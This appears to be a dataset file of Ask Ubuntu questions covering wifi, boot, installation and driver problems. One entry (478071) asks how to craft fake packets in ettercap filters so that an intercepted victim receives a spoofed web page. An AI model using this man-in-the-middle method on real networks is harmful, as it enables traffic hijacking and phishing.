478052	irc chat on telepathy	i 'm trying to figure out how to get irc working on telepathy . i have installed the telepathy-idle package as suggested here and here . i have installed these telepathy packages ii kde-config-telepathy-accounts 0.6.3-0ubuntu1 ii kde-telepathy 0.6.0ubuntu1 ii kde-telepathy-approver 0.6.3-0ubuntu1 ii kde-telepathy-auth-handler 0.6.3-0ubuntu1 ii kde-telepathy-call-ui 0.6.3-1ubuntu2 ii kde-telepathy-contact-list 0.6.3-1fakesync1 ii kde-telepathy-data 0.6.3-1fakesync1ubuntu1 ii kde-telepathy-desktop-applets 0.6.3-0ubuntu1 ii kde-telepathy-filetransfer-handler 0.6.3-0ubuntu1 ii kde-telepathy-integration-module 0.6.3-0ubuntu1 ii kde-telepathy-minimal 0.6.0ubuntu1 ii kde-telepathy-send-file 0.6.3-1 ii kde-telepathy-text-ui 0.6.3-1 ii libtelepathy-farstream2 : amd64 0.4.0-3ubuntu1 ii libtelepathy-glib0 : amd64 0.20.4-1 ii libtelepathy-logger3 : amd64 0.8.0-1 ii libtelepathy-logger-qt4-1 : amd64 0.6.0-0ubuntu1 ii libtelepathy-qt4-2 : amd64 0.9.3-0ubuntu6 ii libtelepathy-qt4-farstream2 : amd64 0.9.3-0ubuntu6 ii telepathy-gabble 0.18.1-1 ii telepathy-haze 0.6.0-1 ii telepathy-idle 0.1.16-1 ii telepathy-logger 0.8.0-1 ii telepathy-mission-control-5 1:5.14.1-1ubuntu6 ii telepathy-salut 0.8.1-1 but i 'm not getting irc as an option when add new accounts . i get these instead .
478053	mac ubuntu from usb & install wlan driver	i have recently installed ubuntu from my usb-stick on my mac . now i have no driver for a wifi-wlan-connection . i have tried to install `` backports-3.12-1 '' on it . but the program always says that permission to /dev/.. denied . can i install wlan-drivers on ubuntu for internet-connection ? i do n't want install ubuntu on the hard-disk of my macintosh .
478059	does fsck keep existing files ?	this is a rather dumb question but my googling did n't give me any direct anwser . so i have a computer which ubuntu ( 12.04 ) filesystem has gone corrupted . now i want to try to repair it with fsck from a live usb but since there are alot of important files ( mainly pictures ) i want my files not to get deleted . so i 'd like to know that does fsck keeps my files when i start the repair process ?
478060	installing ubuntu 14.04 lts alongside 12.04 lts	i just tried to install the 14.04 lts version of ubuntu alongside with the 12.04 lts version using the `` live cd '' i faced the problem ( the installation freezed ) after clicking on `` install '' button when i chosed the size of the partition . ( i 've waited for a moment : one hour.. ) thank you .
478066	restrict ap-hotspot to connect to a fixed number of devices or only to known devices	i use ap-hotspot ( http : //www.webupd8.org/2013/06/how-to-set-up-wireless-hotspot-access.html ) to share lan connection on my ubuntu pc to my android mobile . i want to know if i can restrict the connection to only a fixed number of devices or give the device id list and ask it to connect only to the devices in the list . is this possible
478071	how to create a fake packet that can be used in ettercap filters	i am working on ettercap filters and came across inject ( file ) function provided by it . this function simply injects the contents of file specified in the current packet . we can also drop the entire packet and inject a new one using the same function . can anyone please tell me how to create a fake packet ( or simply a packet ) that can be used in this function ? an example for the same would be great . basically , what i am trying to do is : i am an attacker and intercepting all the traffic between victim and router using ettercap tool . when the victim requests for some page say `` xyz.com/page1.html '' , he is sent to the original webpage . however , when he requests another page say `` xyz.com/page2.html '' , i am sending him a fake page that looks similar to the original to the `` page2.html '' . for this purpose , i am using ettercap filters . is there any better way to do this ? thanks .
478072	is there a browser based front end for searching files on my server ?	searching on local clients over smb is crazy slow and the users in the office will struggle with locate | grep . is there a frontend i can run in the browser for my users to find files ? i 've had sphinx suggested as a search tool but i do n't have the know-how to implement it as a search for my users .
478073	what actions does ubuntu trigger when battery is low ?	when the battery is low , the screen gets dimmed after a few seconds already . this appears to be some special power-saving mode , and might be related to the time in org.gnome.settings-daemon.plugins.power.time-low ( 1200 seconds ( 20 minutes ) the default ) . while this seems to get triggered by gnome-settings-daemon , i wonder what else ubuntu does when this happens ( e.g . via dbus listeners ) , or other event listeners that look for a `` low battery '' state . it seems like something in this regard causes ubuntu / x / the system to behave more sluggish afterwards ( when the laptop is on ac again ) , and i would like to look into what might be causing this . i could not find anything related via dconf-editor , e.g . in org.gnome.settings-daemon.plugins.power . it appears to get setup via idle_configure in plugins/power/gsd-power-manager.c , but it 's probably something more related to something that listens on the dbus interface , which gets notified via e.g . : if ( ! g_dbus_connection_emit_signal ( manager- > priv- > connection , null , gsd_power_dbus_path , `` org.freedesktop.dbus.properties '' , `` propertieschanged '' , props_changed , & error ) ) i could imagine that some `` power saving '' property gets set , but not unset when ac is available anymore and/or the battery is not low anymore . i have looked at the cpu governor setting ( /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor ) , but it was ondemand . i am using gnome-settings-daemon with awesomewm on ubuntu 14.04. gnome-settings-daemon=3.8.6.1-0ubuntu11.1 i 've also compared gsd 's plugins/power/gsd-power-manager.c with the one from debian 's gnome-settings-daemon-3.12.1 , but could not find anything obvious that might have been fixed/changed in this regard . i have managed to trigger the gnome-power-manager 's gnome-settings plugin ( which dims the screen etc ) , by patching upower and use it after killing the system 's upower daemon . ( note that it 's probably only energy that is being used by gpm to calculate it by itself ) . it does not make the system become sluggish.. otoh i have not heard the speaker 's beeping , which might come from the bios , which might be involved here , too - or other programs using the kernel 's interface on /sys/class/power_supply/bat0/ . -- - src/linux/up-device-supply.c.orig 2014-06-07 16:48:32.735920661 +0200 +++ src/linux/up-device-supply.c 2014-06-07 16:48:39.391920525 +0200 @ @ -821,6 +821,9 @ @ supply- > priv- > energy_old_first = 0 ; } + percentage = 3.1f ; + time_to_empty = 3*60 ; + energy = 5 ; g_object_set ( device , `` energy '' , energy , `` energy-full '' , energy_full ,
478077	why are there fewer official apps for linux ? eg : ( official google drive/gui git etc are missing )	take git gui apps for linux ( example ) , compare them to mac/windows apps here you would probably feel the difference.why is this , linux , in spite of being powerful , free , open source has n't been able to attract good applications for itself.google drive application has n't yet been released for linux.why is linux ignored ? the software centre looks like it has apps from the early 2000 .
478079	does brasero convert a dmg file to iso ?	is it possible to use brasero in the command line to convert a dmg file to iso ?
478080	what is difference between install desktop-environment and run directly distro ?	my question is what is difference between installing perticular desktop environment on ubuntu and using directly that ( default -environmented ) distro/flavour of ubuntu ? example : two options : install ubuntu-gnome-desktop or kubuntu-desktop or xubuntu-desktopetc . ( official & recognized derivatives ) alternatively on ubuntu ( default -unity desktop ) use ( run ) perticular distro/flavour ubuntu-gnome or kubuntu or xubuntu etc . i want to know is both method working same performance ? and which is proper method to use desktop environment .
478084	wifi port to work as a router - supported ports	i have a dual boot system where ms windows and ubuntu linux are installed . on my windows partition , i installed virtualrouter and i am able to share my internet connection ( broad band / modem etc. ) . incidentally , i wish to do the same with the ubuntu linux partition as well . i installed ap-hotspot and tried to configure it . the system says that the wifi port is not supported for ap-hotspot .
478086	recover data in linux removed with rm	today i deleted my home directory ( in wrong action ) with : sudo rm -rf * and when i use extundelete i get this message : root @ ubuntu : ~ # sudo extundelete -- restore-directory /home/hamed/ /dev/sda2warning : extended attributes are not restored . loading filesystem metadata ... 746 groups loaded . loading journal descriptors ... 29931 descriptors loaded . searching for recoverable inodes in directory /home/hamed/ ... 498 recoverable inodes found . looking through the directory structure for deleted files ... 498 recoverable inodes still lost . no files were undeleted . why it ca n't recover ? anyone can help me to return my desktop , documents and etc ? i have ubuntu 14.04 .
478087	virtual box resolution issue	i installed ubuntu 14.04 in virtual box in another ubuntu 14.04 installed machine for testing , it 's turning on and resolution has set to 640x480 , is there any way to fix this issue ? i tried every possible solution i found in the internet but nothing was helping me rather than making it a worse
478088	install 14.04 and hold my data	i want to upgrade from 13.10 to 14.04 . but there is error occured . i want to install new ubuntu from usb . but i do n't know how about in this case my data and /var/www folder . can i hold them or are there deleted !
478092	can not set chrome as default browser	this has been asked before but there is no answer that works for me . the last answer i saw said to use system settings . if i look there ( details , default applications , web ) , it says that chrome is my default browser . but every time i launch chrome , it asks me again . if i look within chrome under settings , default browser , it says that it is not the default browser . there is a large button marked `` make google chrome the default browser '' but , as someone else as already reported , this button has no effect . i am on the stable channel for chrome . i tried making a comment to the existing thread but was unable to . that is why i am asking as a new question .
478094	find out my graphics memory two cards ubuntu 14.04	i am trying to install age of empires iii on my pc under playonlinux , but i am having some problems with graphics memory . it asks for the graphics memory on the installer . i tried what some tutorials suggested , but they are designed for one card . i have two ( both ati ) to support my two vga monitors . can someone please say how i could find the memory ?
478096	can not login to ubuntu 14.04 returns to the login screen	i updated to 14.04 from 12.04.03 . i was using cinammon at that time . when i upgraded to 14.04 , i got a serious problem . i was unable to login , as whenever i hit enter after entering password , it is taking me straight to login screen again.i unable to login like guest even . so , here is my .xsession-errors file . possibly anyone could help . thanks in advance . script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd respawning too fast , stopped init : gnome-settings-daemon main process ( 14717 ) killed by trap signal init : gnome-settings-daemon main process ended , respawning init : update-notifier-crash ( /var/crash/_usr_bin_gnome-session.1000.crash ) main process ( 14607 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_ibus_ibus-x11.1000.crash ) main process ( 14623 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_x86_64-linux-gnu_bamf_bamfdaemon.1000.crash ) main process ( 14663 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_ibus_ibus-ui-gtk3.1000.crash ) main process ( 14620 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_gnome-session_gnome-session-check-accelerated.1000.crash ) main process ( 14612 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_gnome-settings-daemon_gnome-settings-daemon.1000.crash ) main process ( 14616 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_unity_unity-panel-service.1000.crash ) main process ( 14629 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_unity-settings-daemon_unity-settings-daemon.1000.crash ) main process ( 14625 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_update-notifier_system-crash-notification.1000.crash ) main process ( 14662 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_gnome-session_gnome-session-check-accelerated.127.crash ) main process ( 14613 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_share_apport_apport-gtk.1000.crash ) main process ( 14665 ) terminated with status 133 init : update-notifier-crash ( /var/crash/linux-image-3.13.0-24-generic.0.crash ) main process ( 14606 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_bin_xorg.0.crash ) main process ( 14609 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_ibus_ibus-x11.127.crash ) main process ( 14624 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_ibus_ibus-ui-gtk3.127.crash ) main process ( 14622 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_gnome-settings-daemon_gnome-settings-daemon.127.crash ) main process ( 14618 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_unity-settings-daemon_unity-settings-daemon.127.crash ) main process ( 14628 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_x86_64-linux-gnu_bamf_bamfdaemon.127.crash ) main process ( 14664 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_bin_gnome-session.127.crash ) main process ( 14608 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_lib_unity_unity-panel-service.127.crash ) main process ( 14634 ) terminated with status 133 init : update-notifier-crash ( /var/crash/_usr_share_apport_apport-gtk.127.crash ) main process ( 14667 ) terminated with status 133 init : gnome-settings-daemon main process ( 14843 ) killed by trap signal init : gnome-settings-daemon main process ended , respawning init : gnome-settings-daemon main process ( 14850 ) killed by trap signal init : gnome-settings-daemon main process ended , respawning init : gnome-session ( gnome ) main process ( 14727 ) killed by trap signal init : gnome-settings-daemon main process ( 14859 ) killed by trap signal init : logrotate main process ( 14570 ) killed by term signal init : upstart-dbus-session-bridge main process ( 14683 ) terminated with status 1 init : disconnected from notified d-bus bus
478099	problem installing latest faience theme on ubuntu 14.04	i followed these articles to install the latest version of faience theme on ubuntu 14.04 http : //www.webupd8.org/2014/06/popular-faience-gtk-gnome-shell-themes.html http : //www.noobslab.com/2014/06/faience-theme-is-now-available-for.html and i 'm getting the following error : preparing to unpack ... /faience-theme_0.7_all.deb ... unpacking faience-theme ( 0.7 ) over ( 0.5.4 ) ... dpkg : error processing archive /var/cache/apt/archives/faience-theme_0.7_all.deb ( -- unpack ) : unable to open '/usr/share/themes/faience-ocre/gtk-2.0/apps/dummy.png.dpkg-new ' : no such file or directory no apport report written because the error message indicates an issue on the local system errors were encountered while processing : /var/cache/apt/archives/faience-theme_0.7_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) that dummy.png.dpkg-new seems a bit suspicious ... is anybody else having the same trouble ?
478101	still getting 403 on apt-get install : no proxy , urls seems valid	i 'm trying to install libreoffice ( or openoffice ) on ubuntu server 12.10 , the packages exist - verified with `` apt-cache search '' , the file /etc/apt/apt.conf.d/30proxy does n't exist on my system the text 'proxy ' is n't mention in grep proxy /etc/apt/apt.conf.d/ other packages that i tried to apt-get-install -- are installed ok. the only thing i have n't done is to replace the respository servers ; i 'm afraid it can break the dpkg system ! related questions apt-get 403 forbidden apt-get 403 forbidden , but accessible in the browser proxy blocking apt-get , allowing wget/curl apt-get upgrade gives `` 403 forbidden '' error what else can i do to solve this 403 error and install liber/open-office using apt ?
478102	how to prevent creation of monitors.xml ?	i 'm using ubuntu on a tablet and have a problem with the screen rotation , which i can fix by removing ~/.config/monitors.xml , but sadly every time i rotate the screen a new monitors.xml is created . is there any way to prevent this ? i already tried to create an empty file with the same name as root but it was still overwritten after rotating the screen . edit : i think i finally found the reason for the problem . everytime the orientation is changed the new orientation is saved in monitors.xml while the original monitors.xml is saved as monitors.xml.backup . by playing around with chattr i found out that this causes ubuntu to try to restore monitors.xml out of monitors.xml.backup after every login . so if i turn the screen to the left and then back to normal monitors.xml says `` orientation=normal '' and monitors.xml.backup says `` orientation=left '' . after the login ubuntu overwrites monitors.xml with the backup and uses its configuration and turns the screen to the left . edit2 : i was able to fix the problem with an init-script , that is executed on shutdown and restart and removes monitors.xml and its backup .
478106	system boots straight to windows after installing ubuntu 14.04	i have this notebook that came with windows 8 pre-installed . i resized its partition , created a new one and installed ubuntu 12.04 on the new one . however , since 12.04 lacked some drivers i needed , i thought the quickest path would be going back to windows and formatting the ubuntu partition and installing 14.04 on it . now when i turn the notebook on i go straight to win 8 ( fast boot , secure boot etc.. all disabled ) . i used an ubuntu live usb to try to boot repair ( using this link : https : //help.ubuntu.com/community/boot-repair ) , however the error could n't be repaired and i 've got the following log : http : //paste.ubuntu.com/7569507 in this config , sda7 is ubuntu , sda5 is swap and everything else is windows . so , my question is , how could i repair grub ? thanks .
478107	installation failed due to partition	when i tried to install ubuntu 13.10 instead of red hat , something like /dev/mapper/volgroup showed up in my installation type screen , and during the install it ended up showing that grub is failed and this is fatal error . i managed to format my entire disk , after that when i tried to install ubuntu , in the installation type screen , it never shows any formated disk , and when i click on + sign it immediately get closed . i formated my 80 gb hard disk as 35gb ext4 , 35gb ext2 and 10gb as swap linux . what is the problem with it ?
478109	libxslt.so.1 : can not open shared object file : while trying to load libreoffice & ubuntu software center	whenever i try to load libreoffice on ubuntu 13.10 it crashes . then i try to load it from the terminal and it gives me this error : /usr/lib/libreoffice/program/soffice.bin : error while loading shared libraries : libxslt.so.1 : can not open shared object file : no such file or directory i have tried to install the dev package libxslt1-dev and it tells me that i have the newest version . i have also noticed that the ubuntu software center crashes with that same error as well . any help is appreciated . thanks
478114	can not unlock login screen 14.04	when my computer boots , entering the correct password wo n't start my session . i found out the problem is /home/user/.xauthority ownership . root owns this folder and giving the ownership to the user will solve the problem ... for a while . i do n't know how or when , but the ownership will go back to root pretty often ; it can happen just after one boot or ten . is there a definitive solution to this problem ?
478116	how to correct file path to drupal 7 installation	i 've been schooling myself - finally have drupal 7 installed on ec2 ubuntu-trusty-14.04-amd64-server ( ebs ) using drush . current hurdle is 404 not found : http : //ec2-xx-xx-x-xxx.us-west-1.compute.amazonaws.com/drupal7/install.php to complete the installation . source of the problem i believe are these file paths i have ( as viewed with winscp ) : /etc/drupal/7/sites/default/ -- contains dbconfig.php and settings.php/home/ubuntu/example/ -- contains all the drupal folders and files including the install.php file . i set up the server as the root user following steps provided by `` witchcraft '' ( answer # 6 ) here : http : //drupal.stackexchange.com/questions/3729/amazon-ec2-virtual-server-setup-and-deploying-drupal-7-website . help in straightening this out is greatly appreciated with many thanks in advance . chris
478118	ubuntu wifi hotspot can not share network	i am using hostapd for my wifi hotspot , and i can connect my wifi perfectly until today . i have isc-dhcp-server and bind9 running on my laptop , because i want my laptop to be dhcp and dns server . everything works perfectly until today . the problem is : when i start hostapd , my phone can connect to the wifi , however , there is no network connection on my phone , but wifi is connected . and my dhcp and dns works fine on my phone , just can not connect to network . laptop has connected on network , and i set wlan0 as static address as usual auto wlan0 iface wlan0 inet static address 192.168.1.1 netmask 255.255.255.0 and the eth0 auto eth0 iface eth0 inet dhcp and i never forget to do this : sudo iptables -t nat -a postrouting -s 192.168.1.0/24 -o eth0 -j masquerade sudo sysctl net.ipv4.conf.all.forwarding=1 i my sure , i am using eth0 to connect network on laptop all these thing should work well , and as i said it works many many times and i dont know why it can`t work now . i am wondering that is there any problem with my iptable , so i did sudo iptables -f anyone can help me ? i really feel uncomfortable with this problem . thanks and regards
478119	grub menu problem	i 'm using ubuntu alongside windows 8.1. because of some problems i 'll have to setup windows again but after installing windows the ubuntu grub menu will disappear . is there any easy way to bring it back without `` easybcd '' software ?
478123	dual boot install win 8.1/ubuntu 14.04	i have a problem setting up dual boot on my lenovo g770 notebook . i installed windows 8.1 64-bit without a problem . now i wanted to install ubuntu 14.04 alongside the existing win 8.1 installation . so i tried installing it from a bootable usb-stick . i can select the usb-stick as a boot medium , but then it will just start into a black screen with a blinking cursor . things i tried : verified the integrity of the ubuntu image installing ubuntu 12.10 instead no result . when i try to install fedora it works without a problem . does anbody have an idea what to do/try to get it working ?
478124	how do i repair a fat 32 filesystem partition `` input/output error ''	some how the partition ( dev/sda2 ) partition got deleted . so i use testdisk to bring it back ... the first time i did it it erase the whole hard drive ... the second time it did restore the partition which is good . but now it is giving me a error massage when i try to open it in files ( gnome ) . if you need it in text here : error when getting information for file '/media/ubuntu-gnome/backup/user ' : input/output error
478126	unity not working after upgrade ubuntu 13.04 to 14.04	the problem is basically that unity seems broken after an upgrade from 13.04 to 14.04 lts on x64 , so here goes : 1 ) the unity logon screen looks strange - e.g . the user names are hardly legible due to poor contrast - but i can still use the screen to log on . the problem described below affects all users . 2 ) after logging on , the standard ubuntu wallpaper appears `` blank '' with no panel and no launcher . there is simply `` ubuntu 14.04 lts '' in the bottom left , apparently carried over from the logon screen . 3 ) i can switch to the text terminal with ctrl+alt+f1 . 4 ) there i did a series of fixes found online , such as : rm -rf .compiz-1 dconf reset -f /org/compiz setsid unity unity-tweak-tool -- reset-unity export display=:0 dconf reset -f /org/compiz unity -- reset-icons & disown i also run ccsm and made sure the unity plug-in and opengl are activated . 5 ) i can now start unity for the current session by entering the command unity , but i have to switch to the text terminal and enter unity every time i log on now . 6 ) the output from the `` unity '' command is as follows : warning : no display variable set , setting it to :0 stop : unknown job unity-panel-service start : unknown job unity-panel-service compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compigconfig - info : backend : gsettings compigconfig - info : integration : true compigconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : openg1 compiz ( core ) - info : starting plugin : openg1 compiz ( core ) - info : unity is full supported by your hardware compiz ( core ) - info : unity is full supported by your hardware compiz ( core ) - info : starting plugin : openg1 7 ) with ctrl+alt+f7 i can switch to the unity session , where the launcher now works and the standard application icons appear down the left side . but the panel is completely empty . the windows all look kind of `` old style '' to me ( i think ) . any help much appreciated !
478130	firefox does n't show texts	my firefox does n't show text on some sites , such as google : i use firefox 29 and ubuntu 14.04 ( trusty tahr ) .
478132	where i put my network address on ubuntu ?	in windows when i put my ip address like that 116.193.170.37 255.255.255.0 116.193.170.1 and their network address : 00241d3c6fcf but in ubuntu i cound not put my network address . i do n't know where i put my network address . if you kindly tell me
478133	selinux install error	i tried to install selinux using the terminal with the following : sudo apt-get install selinux when it had finished , it said that there was en error . these are a few of the last lines which contained the error messages : starting selinux autorelabel [ ok ] processing triggers for initramfs-tools ( 0.103ubuntu4.1 ) ... update-initramfs : generating /boot/initrd.img-3.13.0-29-generic selecting previously unselected package selinux-policy-ubuntu . ( reading database ... 285160 files and directories currently installed . ) preparing to unpack ... /selinux-policy-ubuntu_0.2.20091117-0ubuntu2_all.deb ... unpacking selinux-policy-ubuntu ( 0.2.20091117-0ubuntu2 ) ... setting up selinux-policy-ubuntu ( 0.2.20091117-0ubuntu2 ) ... updating /etc/selinux/config . processing triggers for selinux ( 1:0.11 ) ... semodule deferred processing now taking place error opening /etc/selinux/ubuntu/contexts/files/file_contexts.local : no such file or directory libsemanage.sefcontext_compile : sefcontext_compile returned error code 255 . compiling /etc/selinux/ubuntu/contexts/files/file_contexts.local libsemanage.semanage_install_active : could not copy /etc/selinux/ubuntu/modules/active/file_contexts.homedirs to /etc/selinux/ubuntu/contexts/files/file_contexts.homedirs . ( no such file or directory ) . /usr/sbin/semodule : failed ! dpkg : error processing package selinux ( -- configure ) : subprocess installed post-installation script returned error exit status 1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can anybody of you help me solve this problem ? would really appreciate it .
478137	slow internet on ubuntu 14.04	i have a vaio fitflip laptop and i dual booted it with windows and ubuntu . the problem is , when i 'm in another room where the wireless signal is not really strong , the internet connection goes really slow and disconnects automatically a lot and asks for the wireless password . when i 'm in the same room where the wireless router 's signal is stronger , it does n't seem to have that problem . this does n't happen when i 'm using windows , so i think it is related to ubuntu . what can i do to fix this ?
478139	is there any particular desktop environment which android uses and is there any way to get on on ubuntu ?	as android is based on linux , it might have a desktop environment . so is it possible to get it on ubuntu or at least build it from source to use it on ubuntu ?
478142	how do i get other resolution option other than default one in full screen ?	i want to get my 1366x768 monitor to have other screen resolution 800x600 or 1240x768 in full screen . what option do i have ? thanks . here what i did , shaharil @ busuk : ~ $ xrandr screen 0 : minimum 8 x 8 , current 1366 x 768 , maximum 8192 x 8192 vga-0 disconnected ( normal left inverted right x axis y axis ) lvds-0 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 309mm x 174mm 1366x768 60.0*+ hdmi-0 disconnected ( normal left inverted right x axis y axis ) shaharil @ busuk : ~ $ cvt 800 600 60 # 800x600 59.86 hz ( cvt 0.48m3 ) hsync : 37.35 khz ; pclk : 38.25 mhz modeline `` 800x600_60.00 '' 38.25 800 832 912 1024 600 603 607 624 -hsync +vsync shaharil @ busuk : ~ $ xrandr screen 0 : minimum 8 x 8 , current 1366 x 768 , maximum 8192 x 8192 vga-0 disconnected ( normal left inverted right x axis y axis ) lvds-0 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 309mm x 174mm 1366x768 60.0*+ hdmi-0 disconnected ( normal left inverted right x axis y axis ) shaharil @ busuk : ~ $ xrandr -- newmode `` 800x600_60.00 '' 38.25 800 832 912 1024 600 603 607 624 -hsync +vsync shaharil @ busuk : ~ $ xrandr -- addmode lvds-0 800x600_60.00 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 27 current serial number in output stream : 28
478143	intenet usb 3g modem huawei e173s-65 working annormally in ubuntu 14.04 trusty tahr	background the usb modem was initially not working , i found that the issue was mainly because of the new implementation of the modem manager package , so i had to downgrade it to the package modemmanager_0.5.1.97-0ubuntu1_i386.deb the result is that the modem was working perfectly in ubuntu 13.10 saucy salamander . current issue i ca n't remember if the problem started just after the upgrade to from salamander to tahr , or way after that ( i upgraded the distro just right in the moment it was available or rather advisable , i mean when the update manager told me it was available ) , now the problem has became more notorious . the problem is that when working normally in internet , the internet will just `` fall '' . in the network manager notification ( in the unity panel network manager icon , i mean ) it seems like the internet is still working , however i ca n't access any webpage . i do n't think its a mobile provider issue ( as i have had a lot and i know when it is a provider issue ) . when the provider network is down , the modem will physically shut down ( the led will turn off and blink about every 3 seconds ) . short version to make long story short , the modem is still working ( and connected to internet ) , the network manager shows that the internet is still working , but the modem is `` idling '' and i am unable to access any website . advice please avoid stating is a physical issue or a provider issue , it is n't for sure . it have to be a software issue . update list first update every time this happens i have to disconnect ( not physically but from the network icon ) and connect back on the internet , and it works correctly . i have waited up to 15 minutes and it does n't come back so i have to do the described before . i updated chrome from stable to the latest unstable distro . however it does n't seem to be a problem related to chrome as shown in the following picture ( using chrome unstable and firefox ) :
478147	it is possible to hibernate an lxc container ?	i know about lxc-freeze and lxc-unfreeze , but as i understand it , these simply pauses the container , similar to sending sigstop and sigcont to a process . if i reboot the host , then the containers will cease to exist , right ? i would really like a way to save state to persistent storage so that i could resume them at some later time , even the host is rebooted or something like that . i can achieve exactly what i want using virtualbox by using the `` save machine state '' mechanism , but if i could do it with lxc , it would be completely awesome .
478151	gimp/software updater problem	i am running ubuntu 14.04.i installed gimp 2.6.12 ( which i think is better than ver.2.8 ) . how do i stop software updater from asking me to upgrade gimp ? i'ts very irritating .
478156	epson xp-412 on ubuntu 12.04	can anybody help with a link to the driver for the epson xp-412 ? - 32 bit . we 've tried with the drivers from the epson homepage , but we 're unsure which one to use and how to install it properly . thanks in advance .
478158	ubuntu is no longer able to find my wireless card	i am setting up my wireless network . i had to use ndiswrapper since my broadcom device was not detected . once i set up ndiswrapper it showed that i had successfully installed my driver and hardware was detected . when i ran an lsusb it showed my wireless card . i even ran an ndiswrapper -l and it showed hardware detected . i briefly was able to get the wifi to establish . all of a sudden i was unable search for wireless connections . i noticed that my hardware was no longer present . how do i re-install my hardware ? or is there any easier way of getting wifi working again ?
478160	how can i get mintmenu running in kde ?	i 've used kde for a while now and i 'm not going back to gnome , but one thing that i really want is mintmenu instead of lancelot or kickoff , i know it is for gnome , but is there any way to get it running in kde ? the only other thing i 'd settle for is a menu exactly like the one in windows 7 or vista , i want something identical to one of those . why was this downvoted ? i though it was a perfectly valid question . was i wrong ?
478162	how to install the budgie desktop environment on ubuntu ?	is there any way install budgie desktop environment on ubuntu and is it safe to install it ?
478165	display wo n't stay on after ubuntu 14.04 upgrade	after upgrading from 13.10 , i can not seem to get my display to stay on . on start up , i can see the desktop and i am prompted for my keychain password . after entering the password , the display goes black and stays that way . ocassionally , the screen will flicker and i can see the desktop for a fraction of a second . i assume that i need to get new drivers for either the display adaptor or the monitor . i ca n't see the desktop long enough to do that . booting to advanced mode gets stuck when i try to select low graphics . ctrl+alt+f1 gets me a command line , but i do n't know what to do from there . i can still boot to windows with normal graphics . using onboard intel graphics adapter and lenovo monitor . thanks
478166	ca n't detect wireless networks with an intel wireless 5100	iâve been searching the forums for two days now , but none of the answers seems to work for me . i have an acer extensa 5630 which has an intel wifi 5100 . even when i am right next to my router i can not detect the wireless network . the weird thing is , that when i create a hotspot from my mobile phone it automatically detects it and connects to it . i think i do have the correct drivers installed . here is the ifconfig : $ ifconfig eth0 link encap : ethernet hwaddr 00:1d:72 : db:47:5f inet addr:192.168.10.2 bcast:192.168.10.255 mask:255.255.255.0 inet6 addr : fe80 : :21d:72ff : fedb:475f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8419 errors:0 dropped:0 overruns:0 frame:0 tx packets:8173 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5402459 ( 5.4 mb ) tx bytes:953135 ( 953.1 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1377 errors:0 dropped:0 overruns:0 frame:0 tx packets:1377 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:193628 ( 193.6 kb ) tx bytes:193628 ( 193.6 kb ) wlan0 link encap : ethernet hwaddr 00:21:5d:60:72:9a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) this is what it looks like when i scan and detect the hotspot from my android device : wlan0 scan wlan0 scan completed : cell 01 - address : 02:1a:11 : fd : bb : ac channel:6 frequency:2.437 ghz ( channel 6 ) quality=34/70 signal level=-76 dbm encryption key : on essid : '' androidap '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 18 mb/s ; 24 mb/s 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=00000000021577ce extra : last beacon : 40ms ago ie : unknown : 0009416e64726f69644150 ie : unknown : 010482848b96 ie : unknown : 030106 ie : unknown : 2a0100 ie : unknown : 32080c1218243048606c ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 2d1a2c0103ff00000000000000000000000000000000000000000000 ie : unknown : 3d1606000000000000000000000000000000000000000000 ie : unknown : 